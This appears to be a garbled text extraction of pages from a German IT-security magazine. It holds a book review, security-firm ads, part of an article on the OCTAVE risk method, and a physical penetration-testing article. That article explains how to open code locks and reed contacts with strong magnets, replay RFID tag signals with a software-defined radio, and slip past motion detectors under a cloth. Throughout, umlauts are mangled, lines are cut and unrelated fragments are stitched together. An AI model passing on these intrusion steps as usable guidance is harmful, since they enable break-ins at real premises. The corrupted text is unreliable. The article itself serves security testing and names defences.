Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
10201020
PRAXIS
sel mit richtiger Magnet-Codierung eingefuumlhrt werden die Rotoren in die Schlieszligposition gebracht und der Zylinder laumlsst sich drehen Zusaumltzlich kann ein solcher Zylinder mit einer Elektronik auf RFID Basis ausgestat-tet werden Zusaumltzlich zum Magnetcode wird noch ei-ne elektronische Authentifizierung durchgefuumlhrt bevor dieser Zylinder trotz des richtigen Schluumlssels gedreht werden kann So koumlnnen zB verlorene Schluumlssel ge-sperrt werden oder um Mitarbeitern den Zutritt nur zu bestimmten Zeiten zu gestatten
CodeschloumlsserCodeschloumlsser sind in der Regel zugefallene Tuumlren und lassen sich am einfachsten mit den bereits oben vor-gestellten Methoden oumlffnen In diesem Artikel moumlchte ich aber auf eine weitere Schwachstelle hinweisen Die Abbildung 5 zeigt ein typisches Codeschloss anhand des Zylinders auf der rechten Seite kann jeder darauf schlieszligen wie groszlig die Code-Tasten dieses Schlosses in der Realitaumlt sind Wuumlrde man eine Codeeingabe fil-men koumlnnte man anhand der langen Handbewegun-gen auf den Code schlieszligen koumlnnen
Diese Schwachstelle laumlsst sich aber ganz einfach schlieszligen indem man den Eingabetasten die Ziffern fuumlr jede Codeeingabe per Zufallsgenerator zuweist Das bedeutet dass die obere linke Taste nicht permanent die Ziffer 1 eingibt sondern bei jeder Codeeingabe ei-ne andere Durch diese zufaumlllige Anordnung der Zif-fern auf den Tasten laumlsst sich nicht mehr anhand der Handbewegung feststellen welche Ziffer eingegeben wurde Umsaumltzen laumlsst sich eine solche Eingabetech-nik mit Siebensegmentanzeigen oder mini-OLED-Bild-schirmen unter durchsichtigen Tasten bzw mit einem Touchscreen
In Indoor-Bereich trifft man vor einigen Raumlumen auf eine einfachere Version von Codeschloumlssern Bei die-sen Schloumlssern liegt das Eingabeterminal direkt am Schloss an die Energieversorgung erfolgt uumlber Bat-terien Im geschlossenen Zustand laumlsst sich die Tuumlr-klinke ohne Funktion herunterdruumlcken Gibt man den richtigen Code ein wird ein Elektromagnet mit Strom versorgt und Zieht einen Stift an der die Tuumlrklinke mit dem Schloss verbunden Betaumltigt man jetzt die Tuumlrklin-ke so laumlsst sich die Tuumlr oumlffnen Da die Batterien in ei-nem solchen Schloss moumlglichst lange halten sollen arbeiten die Schloumlsser mit einem recht geringen Ma-gnetfeld Dieses Magnetfeld kann man jedoch mit ei-nem von auszligen angebrachten starken Magneten (sie-he auch Abschnitt uumlber Reed-Relais) simulieren und so das Schloss oumlffnen Im Uumlbrigen lassen sich mit einem starken Magneten auch einige aumlltere elektronische Zy-linder oumlffnen
Schlieszligsysteme mit RFID-TagsRFID steht fuumlr radio frequency identification also fuumlr die Identifikation uumlber Funkwellen Diese Technik
Abbildung 6 Ein Elektronisches Codeschloss an einer Gegensprechanlage
Abbildung 5 Ein EVVA-MCS Schluumlssel
Penetration Testing im Jahre 2010
hakin9orgde 21
ist heute sowohl bei Unternehmen als auch in Pri-vathaumlusern (Autoschluumlssel Funk-Garagentoroumlffner) sehr verbreitet und wegen des Komforts beliebt Im Wesentlichen besteht das System aus zwei Kompo-nenten einem RFID Lesegeraumlt und den sogenannten Tags Mit den Tags koumlnnen sich die Zugangsberech-tigten Personen am Lesegeraumlt identifizieren Unab-haumlngig davon ob das Tag aktiv (mit einer eigenen Energieversorgung) oder passiv (die notwendige Energie liefert das Lesegeraumlt) ist wird der Identifi-kationsvorgang vom Tag eingeleitet In den einfach-sten Faumlllen sendet das Tag unverschluumlsselt die eige-ne Seriennummer oder einen vorher eingespeicher-ten Code das Lesegeraumlt empfaumlngt den Code und uumlberpruumlft ob die Seriennummer oder der Code zu-gangsberechtigt ist In den wenigsten Faumlllen erfolgt eine zusaumltzliche Kryptographische Authentifizierung des Tags die aber wegen der geringen Rechenka-pazitaumlt und Energieversorgung sehr einfach ausfaumlllt
Wie kann man solche Systeme uumlberlisten Das Zauberwort dazu lautet bdquoSoftware Defined Ra-dioldquo (SDR) Mit einem SDR Tranceiver ist man in der Lage die Kommunikation zwischen dem Tag und dem Lesegeraumlt aufzuzeichnen und auf einem Rech-ner zu analysieren Anschlieszligend sendet man die aufgezeichneten und eventuell bearbeiteten Daten an das Lesegeraumlt
Wie laumluft ein solcher Angriff ab Zunaumlchst einmal muss man herausfinden auf wel-cher Frequenz die Kommunikation zwischen dem Le-segeraumlt und den Tags erfolgt Dazu kann man uumlber den Herstellernamen des Lesegeraumltes und seinem Produkt-Portfolio gehen oder einfach verschiedene Tags ausprobieren Wenn ein Tag mit dem einge-setzten Lesegeraumlt nicht kompatibel ist erfolgt keine Reaktion Wird dem Tag der Zugang verweigert so zeigt das Lesegeraumlt dies in der Regel an Dann wird ein SRD Tranceiver benoumltigt der auf der benoumltigten Frequenz arbeitet Dazu verwende ich den USRPUSRP2 Tranceiver mit einem passenden Daughter-board und einer Richtantenne (700$1400$ + 275$ + 100$) Der Vorteil dieses Universalsystems liegt daran dass man mit verschiedenen Daughterboard unterschiedliche Frequenzen abdecken kann Die Richtantenne richtet man dann etwas seitlich auf das Lesegeraumlt aus und faumlngt mit der Aufzeichnung der Daten in dem Frequenzbereich an Bei Long Range Tags (das Tag kann mehrere Meter vom Lesegeraumlt entfernt sein) reicht bei Unverschluumlsselten Systemen - wegen der houmlheren Sendestaumlrke - die Aufzeichnung einer Kommunikation aus Passive Tags wie RFID Karten senden ein viel schwaumlcheres Signal deshalb sind die Aufzeichnungen oft gestoumlrt In der Regel be-noumltigt man fuumlnf bis zehn Aufzeichnungen um ein Mus-
Abbildung 8 Eine Uumlberwachungskamera hat eine Veraumlnderung im Bild detektiert Der veraumlnderte Bildausschnitt wird in einem Rahmen angezeigt
Abbildung 7 Das Lesegeraumlt reagiert auf eine Mifare-Classic Karte und lehnt den Zugang ab
10201022
PRAXIS
ter zu finden Der Anfang der Uumlbertragung ist immer gleich in der Mitte gibt es einen variablen Bereich und das Ende ist bei allen Aufzeichnungen ebenfalls gleich Damit ein Lesegeraumlt nun dem virtuellen Tag den Zugang gewaumlhrt saumlubert man zunaumlchst einmal die Aufzeichnungen mit einigen Filtern GNU-Radio bietet hierfuumlr zahlreiche Moumlglichkeiten Dann stellt man sich aus mehreren Aufzeichnungen ca drei moumlglichst ideale (hier braucht man etwas Erfahrung ein gutes Auge und etwas Fingerspitzengefuumlhl) Kom-munikationen zusammen und sendet diese an das Lesegeraumlt Mindestens eine dieser Aufzeichnungen wird dann das Lesegeraumlt akzeptieren und dem An-greifer den Zugang gewaumlhren
Aus der Praxis kann ich sagen dass etwa 90 al-ler RFID-Karten-Systeme sich nur mit der Serien-nummer des Tags zufrieden geben Aumlltere Garagen-toroumlffner arbeiten mit einem statischen Code Neuere Garagentoroumlffner und einige Autohersteller nutzen ei-nen Rolling Code um den Nutzer zu identifizieren Im Maumlrz 2008 wurde auch dieses System von Forschern der Ruhr-Universitaumlt Bochum geknackt Zwei aufge-zeichnete Kommunikationen genuumlgen bereits fuumlr ei-ne Seitenkanalattacke Ebenfalls wurde im Jahr 2008 die Verschluumlsselung des Mifare-Systems per Rever-se Engineering geknackt Solche Verschluumlsslungen verlangsamen nur den Angriff und machen ihn teurer
Gibt es auch sichere RFID-Systeme Die gibt es durchaus Hier verwendet man eine asymmetrische Verschluumlsselung Fuumlr jedes zugangs-
berechtigte Tag wird ein privater und ein oumlffentlicher Schluumlssel erzeugt Der private Schluumlssel wird in einer Datenbank gespeichert auf die das Lesegeraumlt zu-greifen kann Der oumlffentliche Schluumlssel wird auf dem Tag gespeichert Die Identifizierung erfolgt dann in mehreren Schritten Wie oben bereits beschrieben faumlngt das Tag mit der Identifikation an indem es dem Lesegeraumlt seine Seriennummer mitteilt Das Lesege-raumlt generiert daraufhin eine Zufallszahl und sendet diese mit der Seriennummer des Tags wieder zuruumlck (Da die Kommunikation uumlber Funk erfolgt kann es sein dass zur gleichen Zeit mehrere RFID Tags aktiv sind Deshalb muss man waumlhrend der Kommunikati-on stets angeben fuumlr welchen Empfaumlnger eine Nach-richt bestimmt ist) Das Tag empfaumlngt die Nachricht verschluumlsselt diese mit dem oumlffentlichen Schluumlssel und sendet sie an das Lesegeraumlt zuruumlck Kann das Lesegeraumlt die empfangene Nachricht mit dem priva-ten Schluumlssel des Tags entschluumlsseln und stimmt die Nachricht mit der Zufallszahl uumlberein wird der Zu-gang gewaumlhrt
BewegungsmelderBewegungsmelder verwenden fuumlr die Bewegungsde-tektion Passiv Infrarot Sensoren (PIR) Jedes Objekt emittiert eine Waumlrmestrahlung ein PIR Sensor kann diese Strahlung messen Um Bewegungen detektieren zu koumlnnen wird der Sensor mit Buumlndellinsen in Be-reiche aufgeteilt Aumlndert sich die einfallende Strahlung in einem Bereich um einen bestimmten Schwellwert wird dies als Bewegung interpretiert Der Schwellwert sorgt auszligerdem dafuumlr dass statische Temperaturver-aumlnderungen der Umgebung nicht als Bewegung ge-deutet werden Diese Funktionsweise ist leider Fehler-anfaumlllig so kann zB ein kalter Luftstrom bereits einen Bewegungsmelder ausloumlsen Hierfuumlr setzen bessere Bewegungsmelder (Dualmelder) zusaumltzlich noch ei-nen Ultraschall-Sensor ein Nur wenn beide Sensoren ausloumlsen wird eine Bewegung gemeldet Damit sol-len Fehlalarme verhindert werden VdS-Anerkannte Bewegungsmelder die in Alarmanlagen verwendet werden loumlsen zusaumltzlich Alarm aus wenn diese ab-gedeckt werden
Wie kann man Bewegungsmelder uumlberlisten Je groumlszliger die Entfernung zu dem PIR Sensor ist des-to weniger nimmt eine Veraumlnderung Einfluss auf die einfallende Infrarotstrahlung in einem Bereich Auch haben Gegenstaumlnde mit gleicher Waumlrmestrahlung kei-nen Einfluss auf die Sensoren Einen Bewegungsmel-der (auch einen Dualmelder) kann man deshalb mit ei-nem Tuch uumlberlisten Zunaumlchst laumlsst man das Tuch im uumlberwachten Raum einige Minuten liegen damit es die Temperatur der Umgebung annimmt Wenn man sich jetzt in dieses Tuch einhuumlllt und seitwaumlrts mit dem Ruuml-cken zum Bewegungsmelder langsam an diesem vor-
Abbildung 9 Eine Buumlroklammer ist an einer Schnurr befestigt Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so stark dass die Buumlroklammer in der Luft haumlngt
Magnete sind kein Spielzeug
Penetration Testing im Jahre 2010
hakin9orgde 23
beigeht wird keine Bewegung angezeigt Zwar merkt bei einem Dualmelder der Ultraschall-Sensor die Be-wegung da jedoch der Infrarot Sensor keine Bewe-gung meldet findet keine Alarmierung statt Wuumlrde man dieses Tuch etwa 30cm vor dem Bewegungsmel-der aufspannen wuumlrde man den Bewegungsmelder auszliger Funktion setzen Auch eine Abdeckerkennung wuumlrde hier nicht ausloumlsen da diese in der Regel bis 20cm funktioniert
Gibt es AlternativenSicherlich gibt es sie Zunaumlchst einmal gibt es Bewe-gungsmelder die auf Basis von Radarstrahlung funk-tionieren Diese aktiven Bewegungsmelder koumlnnen verdeckt zB unter einer Tapete oder Abdeckplatte in-stalliert werden Dadurch ist ein solcher Bewegungs-meder sowohl optisch nicht wahrnehmbar als auch vor Sabotage und Vandalismus geschuumltzt Ein solcher Bewegungsmelder arbeitet nach dem Dopplerprinzip und strahlt im 9GHz oder 24GHz-Mikrowellenbereich Zwar halten sich die Hersteller solcher Geraumlte an die gesetzlichen Bestimmungen ich wuumlrde allerdings im-mer auf eine zusaumltzliche Strahlenquelle verzichten wo es geht
Eine weitere Alternative zu Bewegungsmeldern sind Kameras Zwar halte ich persoumlnlich nichts von Uumlber-wachung und staumlndiger Videoaufzeichnung doch Kameras sind sehr gute Bewegungsmelder Im Ge-gensatz zu den klassischen PIR Ultraschall oder Ra-darbewegungsmeldern gibt es bei Kameras zahlrei-che Bildpunkte die ausgewertet werden koumlnnen Mit entsprechender Software kann man detektierte Bewe-gungen analysieren und zB mit einer Objekterken-nung interpretieren Verdaumlchtige Bilder lassen sich an ein Sicherheitsunternehmen in Echtzeit uumlbertragen wo ein Mensch beurteilt ob ein Alarm ausgeloumlst wer-den muss oder nicht
Reed-RelaisReed-Relais werden heute verwendet um zB Tuumlr- oder Fensteroumlffnungen zu detektieren Ein Reed-Re-lais besteht einem Reed-Kontakt und einem Magne-ten Der Reed-Kontakt wird am Rahmen befestigt und ist an die Einbruchmeldezentrale angeschlossen Der
Magnet wird auf dem beweglichen Element in Houmlhe des Kontaktes befestigt Wirkt ein Magnetfeld auf den Reed-Kontakt ziehen sich die Schaltkontakte gegen-seitig an und ein Stromkreis wird geschlossen Laumlsst das Magnetfeld nach wenn zB eine Tuumlr geoumlffnet wird und sich der Magnet dem Reed-Kontakt entfernt wird der Stromkreis geoumlffnet In diesem Fall wird dann der Alarm ausgeloumlst
Wie lassen sich Reed-Relais uumlberlisten Das ist vergleichbar einfach Die Antwort auf diese Fra-ge lautet natuumlrlich mit einem Magnetfeld Hierfuumlr eig-nen sich sogenannte bdquoTodesmagnetenldquo (Abbildung 9) Diese Permanentmagneten haben ein extrem starkes Magnetfeld Unter Laborbedingungen hat ein Reed-Kontant bereits bei einer Entfernung von 40cm zum Magneten seine Schaltkontakte geschlossen Holz- Plastik- oder sogar Metall-Tuumlren (sogar 2mm Stahl) bieten keine ausreichende Daumlmpfung fuumlr das Magnet-feld
Eine bessere Alternative zu Reed-Relais sind Licht- oder Laserschranken Diese Schranken bringt man so an dass die Tuumlr den Strahl beim oumlffnen unterbrechen muss
Ziele eines solchen AngriffesEs sind viele Angriffsziele denkbar Es kommt immer auf das Unternehmen an dass angegriffen wird Vor einigen Monaten berichtete die Presse uumlber einen sol-chen Angriff auf einen Baumarkt Kriminelle Einbre-cher haben hier statt waren zu stehlen die Elektronik der Karten-Terminals an den Kassen sabotiert sodass diese die eingelesenen Daten von EC- und Kreditkar-ten samt der vom Kunden eingegebenen PIN per Funk uumlbermittelt wurden Auf dem Parkplatz des Baumark-tes stand dann der Angreifer und hat die Daten emp-fangen
Ein anderes Angriffsziel koumlnnte der Anschluss eines Mini-Computers am Netzwerk sein der ein Loch durch die Firewall bohrt und dem Angreifer einen permanen-ten Zugriff auf das Netzwerk uumlber das Internet gestat-tet Auch ist die Installation eines Hardware-Keylogers denkbar um die Zugangsdaten eines Mitarbeiters aus-zuspionieren
DIMITRI ROSCHKOWSKIDer Autor arbeitet bereits seit vielen Jahren als selbststaumlndi-ger IT-Sicherheitsexperte und Consultant Er fuumlhrt auszligerdem bei Unternehmen Penetration Tests durchKontakt mit dem Autor dimitriroschkowskibiz
Im InternethttpdewikipediaorgwikiLockpicking ndash Wikipedia Ein-trag zum Thema LockpickinghttpwwwevvadezylindernhttpdewikipediaorgwikiReed-Relais ndash Wikipedia Ein-trag zum Reed-Relaishttpwwwelvde ndash Artikel-Nr 68-835-10 ndash Radar Bewe-gungsmelderhttpwwwettuscom
Die IT-Security Community Xchange ist DIE Weiterbildungsnacht fuumlr SystemadministratorInnen Lehrbeauftragte StudentInnen Schuumller-Innen ExpertInnen und Geeks
Themen BiometriePenetration TestingHackz und Crackz Privacy Forensische Analyse Intrusion Prevention Malwarededection Rootkits und deren Erkennung
Freitag 12 November 2010 17 ndash 24 UhrFachhochschule St PoumlltenMatthias Corvinus-Straszlige 15 3100 St PoumlltenT +432742313 228 E officefhstpacatI wwwfhstpacat
Jetzt noch schnell
anmelden unter
httpitsecxfhstpacat
Die Teilnahme ist kostenlos
12-11-2010
OCTAVE
hakin9orgde 25
Um dies zielorientiert und auf die vorhandenen Business Needs maszligzuschneidern sind Risiko-erkennung (Risikoanalyse) und deren anschlie-
szligende Bewertung (Business Impact Analyse) die ersten Schritte die gemacht werden muumlssen
Eine effektive Informations-Sicherheitsbewertung be-trachtet nicht nur den technologischen sondern auch den dahinter liegenden organisatorischen Aspekt Bei-spielsweise die Handhabung der IT-Infrastruktur durch die MitarbeiterInnen bei ihrer taumlglichen Arbeit Durch ei-
ne Risikoanalyse erhaumllt man einen organisationsweiten Uumlberblick uumlber vorhandene Risiken und ist somit integ-raler Bestandteil des Risikomanagements (vergl Abb 1)
OCTAVE ist eine risikobasierende strategische Si-cherheitsbewertungs und -planungstechnik
OCTAVEreg ist ein Kunstwort und setzt sich aus den Begriffen Operationally Critical Threat Asset and Vul-nerability Evaluation zusammen Sie wurde von der Carnegie Mellon University welche auch die populaumlre
OCTAVE ndashHier macht das Risiko die MusikDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanagement und Business Continuity Planning zu implementieren
IN DIESEM ARTIKEL ERFAHREN SIE
ren
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men und Standards
Helmut Kaufmann
Abbildung 2 CIAAbbildung 1 Risikomanagementzyklus
10201026
ABWEHR
heitspraxis und Technologie ins Gleichgewicht zu setz-ten Getrieben von zwei Grundaspekten ndash operationel-les Risiko und aktuell eingesetzte Sicherheitspraktiken wird die dahinter liegende Technologie in Zusammen-hang mit der Sicherheitspraxis gegen die drei Eckpfeiler der Sicherheit gepruumlft (vergl Abb 2)
OCTAVE ist ein wertegetriebener Bewertungsansatz Das Analysis Team
die Organisation wichtig sind
diejenigen Werte die als besonders kritisch beur-teilt werden Beruumlcksichtigt die Zusammenhaumlnge zwischen den kritischen Assets den Bedrohungen und den Verwundbarkeiten
menhang
(organisatorisch und auch einen Plan zur Reduzie-rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-dell fuumlr die Erhebung des gesamtorganisatorischen Schutzbeduumlrfnisses (vergl Abb 3)
Aufbau von Asset-basierenden Bedro-
ndash Das Analyse Team stellt informati-
Web-Site wwwcertorg betreibt passend fuumlr die unter-schiedlichsten Unternehmensgroumlszligen als lizenzfreie Risikoanalyse Methode entwickelt
OCTAVE ist eine selbstgesteuerte Methode Das be-deutet dass die MitarbeiterInnen einer Organisation eine wesentliche Rolle bei der Erstellung der Sicher-heitsstrategie uumlbernehmen Risiken von hoch kritisch erkannten Assets werden dazu verwendet um eine entsprechende Priorisierung der Sicherheitsbereiche durchzufuumlhren
Im Gegensatz zu typischen technologielastigen Be-wertungsmethoden die technologische Risiken und taktische Sachverhalte in den Mittelpunkt der Betrach-tung stellen ist OCTAVE auf organisatorische Risiken und deren dazu notwendigen Technologieeinsatz aus-gerichtet Sie ist eine aumluszligerst flexible Methode die fuumlr fast alle Organisationen speziell angepasst werden kann Aus der Sichtweise des Autors ist einer der be-merkenswertesten Vorteile jedoch dass die Methode von den MitarbeiterInnen selbst schnell erlernt und kon-tinuierlich durchgefuumlhrt werden kann und somit nach-haltig in den Risikomanagementprozess ohne weitere Kosten integrierbar ist
Ein ausgewaumlhltes kleines Team aus allen operatio-nellen Bereichen der Organisation inklusive der IT Ab-teilung arbeiten zusammen um die Sicherheitsbeduumlrf-nisse der Organisation zu identifizieren und versuchen die Gebiete Operationelles Risiko eingesetzte Sicher-
Abbildung 3 Octave Phasen
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
